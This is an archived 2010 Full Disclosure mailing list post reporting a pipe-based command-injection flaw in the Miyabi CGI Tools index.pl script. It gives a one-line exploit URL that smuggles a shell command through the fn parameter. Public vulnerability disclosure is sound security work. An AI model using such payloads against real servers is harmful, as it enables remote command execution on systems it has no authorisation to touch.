Full Disclosure mailing list archives

Re: Miyabi CGI Tools index.pl command execution


From: Marshall Whittaker <marshallwhittaker () gmail com>
Date: Tue, 29 Jun 2010 16:20:58 -0400

LuLz I forgot to tell how to exploit...

index.pl?mode=html&fn=|uname%20-a|

2010/6/29 Marshall Whittaker <marshallwhittaker () gmail com>

The Miyabi CGI Tools index.pl CGI script suffers from the pipe bug. The
script is attached. It's all in Japanese (I think), I can't read the
comments.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: